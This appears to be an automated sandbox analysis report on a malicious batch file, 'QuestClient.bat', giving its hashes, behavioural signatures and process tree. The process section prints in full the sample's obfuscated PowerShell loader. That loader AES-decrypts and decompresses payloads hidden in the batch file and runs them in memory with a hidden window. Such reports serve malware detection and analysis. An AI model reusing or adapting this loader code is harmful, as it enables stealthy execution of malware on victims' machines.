Analysis
  max time kernel:  120s
  max time network: 121s
  platform:         windows7_x64
  resource:         win7-20240708-en
  resource tags:    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  submitted:        14/08/2024, 17:48
Static task:     static1
Behavioral task: behavioral1
  Sample:   QuestClient.bat
  Resource: win7-20240708-en
  4 signatures
  150 seconds
General
  Target: QuestClient.bat
  Size:   456KB
  MD5:    c2cd34623e825a5da3bd0c3c6a7cc7a0
  SHA1:   1ce81a2392bff443e04b97a9ff76e0316c1ca850
  SHA256: 70c57f82283c07c45bca13b478c4f03bb81387e1d4b3945fc3e6c2483e878bc8
  SHA512: ba0895bee303d9ff1e268b7cc512bc903a12465b6737f21594107d040592f8210b83c26bae3c0f6d0b9a12fd98f8702305a4b3b409a6b63b15c9b2a8d0b34ecf
  SSDEEP: 12288:Ve9+GI3rpF00cj8PF4617iCV1sYJKyoS4osZcD48:Ve9vI3FqgmCRoLosWDD
  Score:  8/10
Signatures
  Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
    Run Powershell and hide display window.
    pid   Process
    1904  powershell.exe

  Suspicious behavior: EnumeratesProcesses (1 IoC)
    pid   Process
    1904  powershell.exe

  Suspicious use of AdjustPrivilegeToken (1 IoC)
    description               pid   Process
    Token: SeDebugPrivilege   1904  powershell.exe

  Suspicious use of WriteProcessMemory (6 IoCs)
    description                        pid   Process  procid_target
    PID 3056 wrote to memory of 2328   3056  cmd.exe  31
    PID 3056 wrote to memory of 2328   3056  cmd.exe  31
    PID 3056 wrote to memory of 2328   3056  cmd.exe  31
    PID 3056 wrote to memory of 1904   3056  cmd.exe  32
    PID 3056 wrote to memory of 1904   3056  cmd.exe  32
    PID 3056 wrote to memory of 1904   3056  cmd.exe  32
Processes
  C:\Windows\system32\cmd.exe
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\QuestClient.bat"
    Depth: 1
    PID: 3056
    Signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MqCXbwte9uhPYEg+s1sfkk76fVMEhUBYBUcawnYJBSM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JloX3aFz+GqYGWzFbTGvHw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Sniec=New-Object System.IO.MemoryStream(,$param_var); $ThfXY=New-Object System.IO.MemoryStream; $dRvPt=New-Object System.IO.Compression.GZipStream($Sniec, [IO.Compression.CompressionMode]::Decompress); $dRvPt.CopyTo($ThfXY); $dRvPt.Dispose(); $Sniec.Dispose(); $ThfXY.Dispose(); $ThfXY.ToArray();}function execute_function($param_var,$param2_var){ $yULDO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pPFbC=$yULDO.EntryPoint; $pPFbC.Invoke($null, $param2_var);}$FirRg = 'C:\Users\Admin\AppData\Local\Temp\QuestClient.bat';$host.UI.RawUI.WindowTitle = $FirRg;$xKJqy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FirRg).Split([Environment]::NewLine);foreach ($nlfgl in $xKJqy) { if ($nlfgl.StartsWith('wycXuQhiigqSLUkYJLaD')) { $nKIZB=$nlfgl.Substring(20); break; }}$payloads_var=[string[]]$nKIZB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Depth: 2
      PID: 2328

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      Depth: 2
      PID: 1904
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken